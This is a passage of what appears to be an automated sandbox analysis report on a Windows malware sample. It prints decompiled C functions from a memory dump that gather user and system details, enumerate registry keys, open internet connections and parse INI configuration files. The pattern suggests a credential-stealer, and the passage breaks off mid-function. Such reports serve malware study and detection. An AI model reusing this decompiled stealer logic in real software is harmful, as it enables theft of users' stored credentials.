        					_v12 = _t132;
        					while(1) {
        						_t133 =  *(_t238 + 2) & 0x0000ffff;
        						__eflags = _t133 - 0x10;
        						if(_t133 < 0x10) {
        							goto L55;
        						}
        						_t219 =  *(_t238 + 4) & 0x0000ffff;
        						__eflags = _t219 - _t133;
        						if(_t219 >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 6) - _t133;
        						if( *(_t238 + 6) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 8) - _t133;
        						if( *(_t238 + 8) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xa) - _t133;
        						if( *(_t238 + 0xa) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xc) - _t133;
        						if( *(_t238 + 0xc) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xe) - _t133;
        						if( *(_t238 + 0xe) >= _t133) {
        							goto L55;
        						}
        						_t134 =  *_t238 & 0x0000ffff;
        						_t208 = _t134 >> 0x00000009 & 0x00000008;
        						_t220 = _t238 + _t219;
        						__eflags = (_t134 & _v28) - _v28;
        						if((_t134 & _v28) != _v28) {
        							L48:
        							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
        							_t102 = _t238 + 0x10; // 0x10
        							__eflags = _t102 - _v12;
        							if(_t102 > _v12) {
        								goto L55;
        							}
        							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
        							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
        								goto L55;
        							}
        							_v16 = _v16 + 1;
        							continue;
        						}
        						_t234 = _t208;
        						_t140 = E00414802(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
        						__eflags = _t140;
        						if(_t140 == 0) {
        							goto L48;
        						}
        						_t141 =  *(_t239 + 0x44);
        						__eflags =  *(_t239 + 0x44);
        						if(__eflags == 0) {
        							L16:
        							_t142 =  *(_t238 + 8) & 0x0000ffff;
        							__eflags = _t142;
        							if(_t142 == 0) {
        								L18:
        								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
        								__eflags = _t143;
        								if(_t143 == 0) {
        									L20:
        									__eflags =  *_t238 & 0x00000010;
        									if(( *_t238 & 0x00000010) == 0) {
        										L31:
        										E0040C275( &_v60,  &_v60, 0, 0x1c);
        										_v60 =  *_t238 & 0x0000ffff;
        										_t209 = _t208 | 0xffffffff;
        										_v56 = E0040C620(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
        										_t151 =  *(_t238 + 6) & 0x0000ffff;
        										__eflags = _t151;
        										if(_t151 != 0) {
        											__eflags = _t151 + _t238;
        											_v52 = E0040C620(_t209, _t151 + _t238);
        										} else {
        											_v52 = _v52 & 0x00000000;
        										}
        										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
        										__eflags = _t155;
        										if(_t155 != 0) {
        											__eflags = _t155 + _t238;
        											_v48 = E0040C620(_t209, _t155 + _t238);
        										} else {
        											_v48 = _v48 & 0x00000000;
        										}
        										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
        										__eflags = _t159;
        										if(_t159 != 0) {
        											__eflags = _t159 + _t238;
        											_v44 = E0040C620(_t209, _t159 + _t238);
        										} else {
        											_v44 = _v44 & 0x00000000;
        										}
        										_t163 =  *_t238 & 0x0000ffff;
        										__eflags = _t163 & 0x00000003;
        										if((_t163 & 0x00000003) != 0) {
        											E00415A65( *(_t239 + 0x3c),  *(_t239 + 0x38));
        											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
        											_t167 = E0040C215(__eflags,  &_v60, 0x1c);
        											 *(_t239 + 0x38) = _t167;
        											__eflags = _t167;
        											if(_t167 == 0) {
        												E00415A3C( &_v60);
        												_t239 = _a4;
        											} else {
        												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
        											}
        											goto L55;
        										} else {
        											__eflags = _t163 & 0x0000000c;
        											if(__eflags == 0) {
        												E00415A3C( &_v60);
        												L47:
        												_t239 = _a4;
        												goto L48;
        											}
        											_t211 = E00411D2E( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
        											_v40 = _t211;
        											__eflags = _t211;
        											if(_t211 == 0) {
        												L54:
        												E0040C1C2(_t211);
        												E00415A3C( &_v60);
        												_t239 = _a4;
        												E00415A65( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
        												_t122 = _t239 + 0x3c;
        												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
        												__eflags =  *_t122;
        												goto L55;
        											}
        											_t176 = E00412400(_t211, _v36);
        											__eflags = _t176;
        											if(_t176 == 0) {
        												goto L54;
        											}
        											_t177 = E0040C14D(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
        											__eflags = _t177;
        											if(_t177 == 0) {
        												goto L54;
        											}
        											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
        											E0040C1FE( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
        											goto L47;
        										}
        									}
        									__eflags =  *(_t238 + 0xc);
        									if( *(_t238 + 0xc) <= 0) {
        										goto L31;
        									}
        									E0041352A( &_v184, _t220, 1,  &_v288);
        									_t186 = E0040D467( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E0040CCFF(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
        									__eflags = _t186;
        									if(_t186 == 0) {
        										goto L48;
        									}
        									_t230 =  &_v184;
        									_t212 = 0;
        									__eflags = 0;
        									do {
        										E0040C52A( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
        										_t212 = _t212 + 1;
        										_t230 = _t230 + 4;
        										__eflags = _t212 - 0x10;
        									} while (_t212 < 0x10);
        									_v32 = _v32 | 0xffffffff;
        									_t208 = 0x10;
        									 *_t230 = 0;
        									_v24 = _t208;
        									_v20 = 0x80000001;
        									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
        									__eflags = _t191;
        									if(_t191 != 0) {
        										goto L31;
        									}
        									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
        									__eflags = _t195;
        									if(_t195 == 0) {
        										_v32 = _v24;
        									}
        									RegCloseKey(_v20);
        									__eflags = _v32 - _t208;
        									if(_v32 == _t208) {
        										GetLocalTime( &_v96);
        										__eflags = _v74 - _v96.wDay;
        										if(_v74 != _v96.wDay) {
        											goto L31;
        										}
        										__eflags = _v78 - _v96.wMonth;
        										if(_v78 == _v96.wMonth) {
        											goto L48;
        										}
        									}
        									goto L31;
        								}
        								_t220 = _t238 + _t143;
        								_t201 = E00414837(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
        								__eflags = _t201;
        								if(_t201 == 0) {
        									goto L48;
        								}
        								goto L20;
        							}
        							_t220 = _t238 + _t142;
        							_t202 = E00414837(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
        							__eflags = _t202 - 1;
        							if(_t202 == 1) {
        								goto L48;
        							}
        							goto L18;
        						}
        						_t203 = E00414ABD(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
        						__eflags = _t203;
        						if(_t203 != 0) {
        							goto L48;
        						}
        						goto L16;
        					}
        					goto L55;
        				}
        				return 0;
        			}























































        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID:
        • String ID: $UA
        • API String ID: 0-101904185
        • Opcode ID: 7159c469049adc8925688a5d226e71439506754fa10b86ebf483b6321c7ebb9a
        • Instruction ID: 171a7e8214387cec5d7214fbebf54cdbf022115b044a305d373e3600447fccf8
        • Opcode Fuzzy Hash: 7159c469049adc8925688a5d226e71439506754fa10b86ebf483b6321c7ebb9a
        • Instruction Fuzzy Hash: DCB1B071900709AADF20EFA5C881BFEB7B4BF44304F50452AF956A6691E738E9C1CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 41%
        			E0040897C(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
        				char _v5;
        				signed int _v12;
        				char _v20;
        				char _v64;
        				char _v552;
        				char _v556;
        				short _v588;
        				void* __ebx;
        				void* __esi;
        				signed int _t62;
        				signed int _t64;
        				signed int _t65;
        				signed short _t71;
        				signed short _t75;
        				void* _t92;
        				void* _t95;
        				void* _t97;
        				signed short _t99;
        				void* _t100;
        				void* _t101;
        				void* _t102;
        				void* _t103;
        				void* _t104;
        				void* _t105;
        				void* _t109;
        				signed int _t111;
        				char* _t112;
        				void* _t113;
        
        				_t109 = __edx;
        				_t106 = __ecx;
        				_t111 = _a4;
        				_t114 =  *_t111;
        				_t99 = 1;
        				_v5 = 0;
        				if( *_t111 == 0) {
        					_t97 = E00411AA3(_t114);
        					 *_t111 = _t97;
        					if(_t97 == 0) {
        						return 0;
        					}
        					_v5 = 1;
        				}
        				__eflags = _a8 & 0x00000001;
        				if((_a8 & 0x00000001) == 0) {
        					L9:
        					__eflags = _a8 & 0x00000002;
        					if((_a8 & 0x00000002) != 0) {
        						_push( &_v12);
        						_push(0x20000);
        						_push(0x2713);
        						_t105 = 4;
        						_v12 = 0x4000001;
        						_t99 = E00411AB7(_t111, _t105);
        					}
        					L11:
        					__eflags = _a8 & 0x00000004;
        					if((_a8 & 0x00000004) == 0) {
        						L16:
        						__eflags = _t99;
        						if(_t99 == 0) {
        							L32:
        							__eflags = _v5 - 1;
        							if(_v5 == 1) {
        								E0040C1C2( *_t111);
        								 *_t111 =  *_t111 & 0x00000000;
        								__eflags =  *_t111;
        							}
        							L34:
        							return _t99;
        						}
        						__eflags = _a8 & 0x00000008;
        						if((_a8 & 0x00000008) == 0) {
        							L20:
        							__eflags = _t99;
        							if(_t99 == 0) {
        								goto L32;
        							}
        							__eflags = _a8 & 0x00000010;
        							if((_a8 & 0x00000010) == 0) {
        								L28:
        								__eflags = _t99;
        								if(_t99 == 0) {
        									goto L32;
        								}
        								__eflags = _a8 & 0x00000020;
        								if((_a8 & 0x00000020) != 0) {
        									E004088C8(_t106, _t111, 2);
        									E004088C8(_t106, _t111, 0x17);
        								}
        								goto L34;
        							}
        							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
        							_a4 = _t62;
        							__eflags = _t62;
        							if(_t62 != 0) {
        								__eflags = 0;
        								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
        								_t106 =  &_v588;
        								_t99 = E00411B64(_t62,  &_v588, _t109, 0, _t111, 0x271e);
        							}
        							_a4 = 0x104;
        							__eflags = _t99;
        							if(_t99 == 0) {
        								goto L32;
        							} else {
        								_t64 =  &_v588;
        								__imp__GetUserNameExW(2, _t64,  &_a4);
        								__eflags = _t64;
        								if(_t64 != 0) {
        									_t65 = _a4;
        									__eflags = _t65;
        									if(_t65 != 0) {
        										__eflags = 0;
        										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
        										_t106 =  &_v588;
        										_t99 = E00411B64(_t65,  &_v588, _t109, 0, _t111, 0x271f);
        									}
        								}
        								goto L28;
        							}
        						}
        						_t112 =  &_v20;
        						E004173DB(_t112);
        						_push(_t112);
        						_push(0x20000);
        						_push(0x271c);
        						_t100 = 6;
        						_t71 = E00411AB7(_a4, _t100);
        						_t99 = _t71;
        						__eflags = _t99;
        						if(_t99 == 0) {
        							_t111 = _a4;
        							goto L32;
        						}
        						__imp__GetUserDefaultUILanguage();
        						_v12 = _t71 & 0x0000ffff;
        						_push( &_v12);
        						_push(0x20000);
        						_push(0x271d);
        						_t101 = 2;
        						_t75 = E00411AB7(_a4, _t101);
        						_t111 = _a4;
        						_t99 = _t75;
        						goto L20;
        					}
        					__eflags = _t99;
        					if(_t99 == 0) {
        						goto L32;
        					}
        					_v12 = E0040C2C4();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x2719);
        					_t102 = 4;
        					_t99 = E00411AB7(_t111, _t102);
        					__eflags = _t99;
        					if(_t99 == 0) {
        						goto L32;
        					}
        					_v12 = E0040C2EC();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x271b);
        					_t103 = 4;
        					_t99 = E00411AB7(_t111, _t103);
        					__eflags = _t99;
        					if(_t99 == 0) {
        						goto L32;
        					}
        					_v12 = GetTickCount();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x271a);
        					_t104 = 4;
        					_t99 = E00411AB7(_t111, _t104);
        					goto L16;
        				}
        				_t92 = E00413447(_t106,  &_v556);
        				_t106 =  &_v552;
        				_t99 = E00411B64(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
        				__eflags = _t99;
        				if(_t99 == 0) {
        					goto L11;
        				}
        				_t95 = E004135A7( &_v552,  &_v64);
        				__eflags = _v64;
        				if(__eflags != 0) {
        					_t106 =  &_v64;
        					_t99 = E00411B64(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
        				}
        				__eflags = _t99;
        				if(_t99 == 0) {
        					goto L11;
        				}
        				goto L9;
        			}

        APIs
        • GetTickCount.KERNEL32 ref: 00408A7B
        • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 00408ACE
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 00408B10
        • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00408B52
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: NameUser$CountDefaultFileLanguageModuleTick
        • String ID:
        • API String ID: 2256650695-3916222277
        • Opcode ID: 616597641f083a28978e273412f3d7216c978760fb7b0a911202f5318b7a9a01
        • Instruction ID: 4df86ae7a39a0350f3a69106ff32d793e36c4f645c6b66347e248ba3f5ff140c
        • Opcode Fuzzy Hash: 616597641f083a28978e273412f3d7216c978760fb7b0a911202f5318b7a9a01
        • Instruction Fuzzy Hash: 9B51E77164124879DB10AB95D945FEE3BA89F11344F08406FFA84BB3D2DF7C9984CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 67%
        			E0041745A(void* _a4, WCHAR* _a8) {
        				char _v40;
        				char _v160;
        				char _v680;
        				void* __edi;
        				void* __esi;
        				void** _t11;
        				void* _t13;
        				void* _t16;
        				void* _t18;
        				void* _t23;
        				void* _t28;
        				void* _t30;
        				WCHAR* _t34;
        
        				_t11 =  &_a4;
        				_t28 = 0;
        				__imp__ConvertSidToStringSidW(_a4, _t11);
        				if(_t11 != 0) {
        					_t37 =  &_v160;
        					_t13 = 4;
        					E004128DB(_t13,  &_v160);
        					_push(_a4);
        					_t34 =  &_v680;
        					_t16 = E0040CEB5(_t37, 0x104, _t34, _t37);
        					_pop(_t30);
        					if(_t16 > 0) {
        						_t18 = 5;
        						E004128DB(_t18,  &_v40);
        						_t23 = E004102E6(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
        						if(_t23 != 0 && _t23 != 0xffffffff) {
        							PathUnquoteSpacesW(_t34);
        							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
        							asm("sbb bl, bl");
        							_t28 = 1;
        						}
        					}
        					LocalFree(_a4);
        				}
        				return _t28;
        			}

        APIs
        • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041746D
        • LocalFree.KERNEL32(?,.exe,00000000), ref: 004174F5
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 004174D5
        • ExpandEnvironmentStringsW.KERNEL32(?,0040BA17,00000104), ref: 004174E2
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
        • String ID: .exe
        • API String ID: 2200435814-4119554291
        • Opcode ID: a2196abe7a033ce2cd8f11988add9b9afefcccc77b9928495a52f5d599c16523
        • Instruction ID: c81c50b1731865f3a9f735791d695ec6ee8297fc3319b9a7c3c80ee406b0a384
        • Opcode Fuzzy Hash: a2196abe7a033ce2cd8f11988add9b9afefcccc77b9928495a52f5d599c16523
        • Instruction Fuzzy Hash: 7A11C671644118ABDB106B7ADD09ECF3BACDF49360F004526F945F71A0D674D989CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040DD96(signed int __eax, char* __ecx) {
        				short _v28;
        				char* _v32;
        				signed int _t5;
        				void* _t12;
        				void* _t14;
        				char* _t15;
        				void* _t18;
        
        				_t15 = __ecx;
        				_t5 = __eax;
        				if(__ecx == 0) {
        					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
        				}
        				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
        				if(_t14 == 0) {
        					L7:
        					return 0;
        				}
        				_t18 = 0;
        				do {
        					_t1 = _t18 + 0x422394; // 0x422394
        					_t2 = _t18 + 0x422390; // 0x2
        					InternetSetOptionA(_t14,  *_t2, _t1, 4);
        					_t18 = _t18 + 8;
        				} while (_t18 < 0x18);
        				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
        				if(_t12 == 0) {
        					InternetCloseHandle(_t14);
        					goto L7;
        				}
        				return _t12;
        			}

        APIs
        • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040DDAD
        • InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 0040DDCC
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DDE9
        • InternetCloseHandle.WININET(00000000), ref: 0040DDF5
        Strings
        • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0040DD9E, 0040DDAC
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$CloseConnectHandleOpenOption
        • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
        • API String ID: 910987326-3737944857
        • Opcode ID: 57d2b6ebd90236b1621037a5e3fc0953de7ec09f38e0969a796a7df0e70bb1fa
        • Instruction ID: 31c2abd5257d5eb995361a56b090b3dec1bd7c8b1db8aafd1295f5d5d417efbd
        • Opcode Fuzzy Hash: 57d2b6ebd90236b1621037a5e3fc0953de7ec09f38e0969a796a7df0e70bb1fa
        • Instruction Fuzzy Hash: 42F0F6726002107BD62257B18D8CD6B6D6EEFCA720704043DF646F1061C63988109778
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E0040E20A() {
        				char _v8;
        				struct HINSTANCE__* _v12;
        				void* _v1036;
        				struct HINSTANCE__* _t13;
        				_Unknown_base(*)()* _t15;
        				char _t22;
        				void* _t28;
        
        				_t22 = 0;
        				_t13 = LoadLibraryA("urlmon.dll");
        				_v12 = _t13;
        				if(_t13 != 0) {
        					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
        					if(_t15 != 0) {
        						_push( &_v8);
        						_push( &_v1036);
        						_push(0);
        						_v8 = 0x3ff;
        						_v1036 = 0;
        						if( *_t15() == 0) {
        							if(_v8 > 0x3ff) {
        								_v8 = 0x3ff;
        							}
        							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
        							_t22 = E0040C620( &_v1036 | 0xffffffff,  &_v1036);
        						}
        					}
        					FreeLibrary(_v12);
        				}
        				return _t22;
        			}

        APIs
        • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040E21B
        • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040E22E
        • FreeLibrary.KERNEL32(?), ref: 0040E280
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: ObtainUserAgentString$urlmon.dll
        • API String ID: 145871493-2685262326
        • Opcode ID: b22fa959e8f82f87aef1e1f4010b1c80639566e36f40f1fa4f2caf69ca530a90
        • Instruction ID: ad4c1c7f4a524baa0e123af2c37521bdaca79dad59a0c43f22bf94fc19087e8e
        • Opcode Fuzzy Hash: b22fa959e8f82f87aef1e1f4010b1c80639566e36f40f1fa4f2caf69ca530a90
        • Instruction Fuzzy Hash: A8018471D01218ABCB10ABF99D849DE7ABCAF04340F2006FEB655F3290D6349E448A68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E004195ED(char* __ecx, void* __eflags) {
        				int _v8;
        				void* _v12;
        				signed int _v16;
        				char* _v20;
        				intOrPtr _v24;
        				int _v28;
        				intOrPtr _v32;
        				char _v36;
        				void* _v40;
        				intOrPtr _v44;
        				char* _v48;
        				char _v60;
        				char _v80;
        				char _v100;
        				char _v120;
        				char _v152;
        				char _v216;
        				char _v284;
        				short _v804;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t70;
        				int _t102;
        				int _t110;
        				int _t114;
        				void* _t115;
        				signed int _t117;
        				void* _t119;
        				intOrPtr _t121;
        				void* _t124;
        				intOrPtr _t127;
        				int _t134;
        				intOrPtr _t136;
        				char* _t138;
        				char* _t141;
        				signed int _t145;
        				void* _t146;
        				void* _t147;
        
        				_t129 = __ecx;
        				_t70 = E0040C192(0xc08);
        				_t127 = _t70;
        				_t134 = 0;
        				_v24 = _t127;
        				if(_t127 == 0) {
        					return _t70;
        				} else {
        					E004128DB(0x83,  &_v216);
        					_t141 =  &_v284;
        					E004128DB(0x84, _t141);
        					_v48 =  &_v216;
        					_v44 = _t141;
        					E0040C275( &_v36,  &_v36, 0, 8);
        					E004128DB(0x85,  &_v120);
        					E004128DB(0x86,  &_v100);
        					E004128DB(0x87,  &_v60);
        					_t145 =  &_v80;
        					E004128DB(0x88, _t145);
        					_t12 = _t127 + 0x3fc; // 0x3fc
        					_v20 = _t12;
        					_v16 = 0;
        					do {
        						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
        							goto L22;
        						}
        						_v28 = _t134;
        						_v8 = 0x104;
        						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
        							L21:
        							RegCloseKey(_v12);
        							goto L22;
        						} else {
        							goto L4;
        						}
        						do {
        							L4:
        							_t136 = _v24;
        							_v28 = _v28 + 1;
        							_t102 = E004102E6(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
        							_t145 = _t145 | 0xffffffff;
        							_v8 = _t102;
        							if(_t102 != _t145 && _t102 != 0) {
        								_t137 = _t136 + 0x1fe;
        								_t110 = E004102E6(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
        								_v8 = _t110;
        								if(_t110 == _t145 || _t110 == 0) {
        									_t114 = E004102E6(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
        									_v8 = _t114;
        									if(_t114 == _t145 || _t114 == 0) {
        										goto L19;
        									} else {
        										goto L10;
        									}
        								} else {
        									L10:
        									_t115 = _v12;
        									_t129 =  &_v804;
        									_v40 = _t115;
        									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
        										_t117 = _t145;
        									} else {
        										_t145 =  &_v40;
        										_t117 = E0041040E(_t145,  &_v80, _t116, _v20, 0xff);
        									}
        									_v8 = _t117;
        									if(_t117 != 0xffffffff && _t117 != 0) {
        										_t138 = _v20;
        										if(E00419593(_t138) > 0) {
        											_t145 =  &_v152;
        											_t119 = 0x56;
        											E004128DB(_t119, _t145);
        											_t121 = _v24;
        											_push(_t121);
        											_t129 = _t138;
        											_push(_t129);
        											_push(_t121 + 0x1fe);
        											_t51 = _t129 + 0x1fe; // 0x1fe
        											_t124 = E0040CEB5(_t145, 0x307, _t51, _t145);
        											_t147 = _t147 + 0x10;
        											if(_t124 > 0) {
        												_t129 =  &_v36;
        												if(E0040C5B6(_t124,  &_v36, _v20 + 0x1fe) != 0) {
        													_v32 = _v32 + 1;
        												}
        											}
        										}
        									}
        									goto L19;
        								}
        							}
        							L19:
        							_v8 = 0x104;
        						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
        						_t134 = 0;
        						goto L21;
        						L22:
        						_v16 = _v16 + 1;
        					} while (_v16 < 2);
        					E0040C1C2(_v24);
        					if(_v32 <= _t134) {
        						return E0040C1C2(_v36);
        					}
        					return E00417504(0x307, _v36, 0xcb);
        				}
        			}

        APIs
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004196A4
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004196CF
        • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00419825
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419812
          • Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0041976F
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: e5c4004505b3aaeb9bc7040d0bc67b350e13b74c07a7cf53cce58b0c1c98bbd7
        • Instruction ID: 9ad1833f4a10a3c47b687c9ae7e47e5301de210e04768025638eface8966ead4
        • Opcode Fuzzy Hash: e5c4004505b3aaeb9bc7040d0bc67b350e13b74c07a7cf53cce58b0c1c98bbd7
        • Instruction Fuzzy Hash: 89712771A00119EBEB10EFE5CD85AEFB7BCEF48304F14416AE515F3291E6389E858B64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E004186B3(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				short _v524;
        				char _v564;
        				short _v576;
        				short _v588;
        				short _v600;
        				short _v608;
        				WCHAR* _v612;
        				WCHAR* _v616;
        				WCHAR* _v620;
        				WCHAR* _v624;
        				WCHAR* _v628;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t51;
        				WCHAR* _t54;
        				WCHAR* _t56;
        				void* _t57;
        				void* _t59;
        				void* _t61;
        				void* _t63;
        				long _t67;
        				WCHAR* _t69;
        				long _t77;
        				long _t80;
        				WCHAR* _t82;
        				void* _t83;
        				WCHAR* _t86;
        				WCHAR* _t87;
        				short* _t92;
        				WCHAR* _t93;
        				int _t102;
        				WCHAR* _t107;
        				intOrPtr _t114;
        				signed int _t115;
        				void* _t117;
        
        				_t117 = (_t115 & 0xfffffff8) - 0x26c;
        				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L19:
        					return 1;
        				}
        				_t120 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_t107 = E0040C192(0x1fffe);
        					_v612 = _t107;
        					__eflags = _t107;
        					if(_t107 == 0) {
        						goto L19;
        					}
        					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
        					__eflags = _t51;
        					if(_t51 == 0) {
        						L18:
        						E0040C1C2(_t107);
        						goto L19;
        					}
        					_t9 =  &(_t51[0]); // 0x1
        					_t54 = E0040D072(_t107, _t9);
        					__eflags = _t54;
        					if(_t54 == 0) {
        						goto L18;
        					}
        					_t56 = E0040C192(0xc1c);
        					_v620 = _t56;
        					__eflags = _t56;
        					if(_t56 != 0) {
        						_t11 =  &(_t56[0xff]); // 0x1fe
        						_t92 = _t11;
        						_v624 = _t107;
        						_v616 = _t92;
        						_t57 = 0x5c;
        						_t93 =  &(_t92[0xff]);
        						__eflags = _t93;
        						E004128DB(_t57,  &_v608);
        						_t59 = 0x5d;
        						E004128DB(_t59,  &_v588);
        						_t61 = 0x5e;
        						E004128DB(_t61,  &_v576);
        						_t63 = 0x5f;
        						E004128DB(_t63,  &_v600);
        						do {
        							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
        							__eflags = _t67;
        							if(_t67 != 0) {
        								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
        								_t25 = _t102 - 1; // -1
        								__eflags = _t25 - 0xfffe;
        								if(_t25 <= 0xfffe) {
